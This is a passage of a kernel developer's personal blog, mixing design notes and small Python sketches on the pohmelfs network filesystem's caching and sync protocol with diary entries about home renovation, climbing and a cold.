that it will not be enough. I want, if not a completely smooth surface,
then at least that a hand moved on top of it would feel nothing. Managed
to paint hands and feet, but at least hair was not touched (although
I'm not sure).
Also installed number of electricity sockets, so there is no need to place kettle
far from the 'bed' (i.e. part of the floor).
Overall it was a good development day, I expect next one to be as much
as productive if not more. Nevertheless I hate to be sick...
It also works with much bigger trees (like untarring the linux kernel tree,
although the ugliness of the userspace server requires raising the maximum number of open
file descriptors).
There is a single problem in this case: it is damn slow. And I do not see
an easy explanation for that. Well, tcpdump shows a small window, but that is an end result
I think, not a reason, and the reason is likely in the protocol pohmelfs uses - the system sends
a number of short packets in round-robin fashion, which may be slow for some reason.
Since I'm waiting for real hardware to test things on (since oprofile does not work on the installed
Xen version), I can only handwave about the root of the problem...
And that is exactly the same problem which the write-through cache pohmelfs had at first, I think
even the timings are similar, so after this problem is fixed, a new version will be released.
There is another problem, which complicates the development - I got a cold (second one this year, and third
one for the last 3 or 4 years though), but such condition with some temperature, when brain is in the
'hinged' state between sick and good shape, opens very fun feelings about things around, which usually
ends up with very interesting results.
But overall it does not work, since writeback can happen for any inode
inside the whole not-synced tree, so trying to sync inode number for some
obscure object, which sits in the directory server never saw before, is quite
problematic - the whole tree has to be traversed from the inode under writeback
up to the one which is known for the server host.
Although this is not a very complex task, there is a question about what to
sync. Should the whole directory content be synced, or just a single inode,
and if the former, then should we force writeback for other objects in the directory under
resync... I think the simplest case is to force only higher layer object creations,
not syncing their content (like other objects in the directory), but the directory itself
should be marked as dirty, so that access from different clients forces appropriate
resynchronization.
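The 'simplest case' could look roughly like this. It is only a sketch of the idea with invented names (`Inode`, `known_to_server`, `objects_to_create()`): walk from the inode under writeback up to the first ancestor the server already knows, then create the missing objects from the top down and mark their parent directories dirty.

```python
class Inode:
    """Toy inode with a parent pointer (hypothetical, not the kernel structure)."""

    def __init__(self, name, parent=None):
        self.name = name
        self.parent = parent
        self.dirty = False


def objects_to_create(inode, known_to_server):
    """Return the not-yet-synced chain, topmost object first.

    `known_to_server` is a set of inodes the server has already seen.
    Only the objects on the path are created, directory content is not synced.
    """
    chain = []
    node = inode
    while node is not None and node not in known_to_server:
        chain.append(node)
        node = node.parent
    chain.reverse()
    for obj in chain:
        if obj.parent is not None:
            # Other clients accessing this directory should trigger a resync.
            obj.parent.dirty = True
    return chain


if __name__ == "__main__":
    root = Inode("root")
    a = Inode("a", root)
    b = Inode("b", a)
    f = Inode("file", b)
    print([obj.name for obj in objects_to_create(f, {root})])
```

Creating objects top-down guarantees that the server has seen a directory before anything inside it is created.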
That was a bloody excellent training, but since it was only the third
one this year, I can hardly find a piece of body which is not aching right
now. Maybe ears though...
I started to climb high without the usual warming traverses today, so knees were
damaged first (not counting a couple of strikes by the wall and holds). Then came a
fair number of various attempts to finish a new (quite complex though) route
over blue holds in the right central section, which moves over the new
balcony in that area. Eventually I found the solution (although I think there
is another one, which requires a bit more power, but a bit less technique),
but damaged arms, rubbed all 20 fingers, and made arms very tired. Also tried
some interesting old routes, but since I tried them only for the second time, I failed.
That was ok, legs and back were not aching at that time, but then I found a route
which made the day! An excellent complex and quite short route in the right
vertical corner of the climbing area.
The route requires very interesting technique almost without heavy powerlifting
movements, but good balance and stretching.
I spent more than half an hour there, damaged shoulders and fingers,
stretched everything which was not broken before, but completed the route
(although only piece-by-piece, will finish it cleanly next time), and finally
moved to the shower (even the sauna did not work today) as a number of separate pieces
of crap connected to each other essentially by virtue of the mind.
Excellent day, excellent time!
It is rather dumb and even does not have state machine handling
in the usual meaning.
The existing pohmelfs implementation has only two places where the content of the inode
is 'globally' modified, by 'globally' I mean changes which have to be seen
by other clients if they access the given inode.
First one is directory reading, when inode in question gets information about
other inodes in given one, another one is object creation. Object removal is local
operation, and there are no collisions if multiple clients delete the same object
simultaneously.
When directory is being read first time, pohmelfs just syncs its content from the server,
all subsequent reads happen from cache, since all creations and removals happen locally.
This case is simple.
When pohmelfs is about to create an object, it marks parent inode as dirty,
if parent inode was not marked dirty previously, this ends up sending a single
message to the server. Server in turn can return content of the directory in question,
if that inode was already modified by different client. If there are objects with the same
name as local ones, local objects are 'renamed' to the 'oldname-synctime', so that
user could later run diff or whatever and merge changes. That is how offline
pohmelfs clients work.
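The name collision handling can be sketched as a small merge function. Directory content is modelled here as a plain dict from name to object, and `merge_directory()` and its arguments are hypothetical names; the only part taken from the text is the 'oldname-synctime' renaming.

```python
def merge_directory(local, remote, sync_time):
    """Merge locally created objects into the directory content sent by the server.

    Server entries keep their names. A local object whose name collides with a
    server entry is kept under 'oldname-synctime' so the user can merge later.
    """
    merged = dict(remote)
    for name, obj in local.items():
        if name in remote:
            merged[f"{name}-{sync_time}"] = obj
        else:
            merged[name] = obj
    return merged


if __name__ == "__main__":
    local = {"notes.txt": "local copy", "todo": "local only"}
    remote = {"notes.txt": "server copy", "readme": "server only"}
    print(sorted(merge_directory(local, remote, 1203675123)))
```

The sketch ignores the corner case where the renamed entry collides with yet another existing name.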
Object is always created in the local cache only with local inode number. So far
it is never being sent to server (although code which does it and changes the inode
content exists), even writeback does not work right now (since server does not know
about object with local inode numbers). This part is a bit more complex: pohmelfs
has to sync inode (i.e. to send current inode info, wait until server creates object,
then receive real inode info and change local cache) either in writeback (when
system forces to writeback a page(s), appropriate inode will be synced first)
or in cache coherency algo. For that purpose each network state locking first checks if there
are messages in the queue from the server, which have to be processed first,
so far only server content receiving is supported, forcing to send own content on request
from server is a base of the cache coherency and this is not yet turned on. Here
the major race lives, which can actually lead to a full rethink of the idea. After we locked
own network state and checked that there are no requests from the server, client can start
sending own commands, but before they came to the server, it can start CC resync
(and send messages into the same pipe as clients command) initiated
by different client, which will break protocol state machine. This is main idea to think about.
Oh, and to implement the same logic on server :)
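A minimal sketch of the "check the server queue first" locking described above, again in Python and with made-up names (`NetworkState`, `inbox`, `send_commands`), so it should not be read as the real pohmelfs structures. It also shows where the race window sits.

```python
import threading
from collections import deque


class NetworkState:
    """Hypothetical per-connection state: one lock, one queue of server messages."""

    def __init__(self):
        self._lock = threading.Lock()
        self.inbox = deque()    # messages from the server, not yet processed
        self.processed = []     # server messages already handled
        self.sent = []          # commands this client has put on the wire

    def send_commands(self, commands):
        with self._lock:
            # Every time the state is locked, pending server messages go first.
            while self.inbox:
                self.processed.append(self.inbox.popleft())
            # Race window from the text: the queue is empty here, but the
            # server may start a CC resync before these commands arrive,
            # and then both sides write into the same pipe.
            self.sent.extend(commands)


state = NetworkState()
state.inbox.append("directory content from server")
state.send_commands(["create foo"])
```

The lock only serializes the local side; it does nothing about a resync that the server starts after the queue check, which is exactly the open problem.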
Some kind person added my RSS feed to kernelplanet.org,
which is a kernel hackers' place of shame glory :)
Well, whoever did that probably saw that I frequently write quite a lot
of notes in a day, that I have no political/hacker/whatever ethic in
the blog, that I make too many English errors (especially when I have
no access to a dictionary) and so on; I hope it is not that bad.
So, a couple of words about what this is. This blog is fully devoted to how
I spend my days: hacking, having a rest, sleeping and going to the toilet...
The blog has comments (with a somewhat user-unfriendly captcha), and the number of them
can be found at the end of each message. When a new comment is added, the entry is updated,
so stream-based aggregators will see it as a new one. Usually there are 1-3 entries
per day, sometimes more, sometimes none.
Also replaced the electricity switch with a new one and installed
the warm floor thermal system in the bathroom, but the latter is not yet
fully completed (the wires are connected without good insulation yet,
and the thermal controller is not placed into its own socket in the wall
but hangs on its wires). Still, it works (I do not know how well, and
I will turn the electricity off when I leave home; I will check its
thermal capabilities when I'm able to stop the fire...).
I started the electricity projects in the bathroom, which required
setting up electricity sockets for the light switch and the warm floor. During
installation I managed to get dirty with mounting foam, which,
if you do not know, is much, much harder to clean off than
any other material we have. And I managed to get it
not on my hands (that's usual), but in my hair (it was the first time I worked without a hat).
This forced me to wash my head with acetone... It was not that bad actually,
except maybe for the smell, so eventually I cleaned almost all the dirty areas
(about one quarter, I believe; since I have no mirror I cannot say for sure)
and washed it a couple of times the usual way, but that stopped me from further
development for today.
Maybe I will finish it tomorrow.
At LWN.net. And as usual, I do not have an account this time...
So, I will wait a week for the free article; by that time pohmelfs will contain very tasty things
which do not exist in any other fs out there (or at least not in a single filesystem).
Edited to add that Simon Holm Thøgersen shared a link to the article. It is somewhat fun,
although the author (Jake Edge) writes quite differently from Jonathan Corbet imho. The article
does not compare pohmelfs and crfs, but shows that they are very similar. I've known that
Zach Brown wo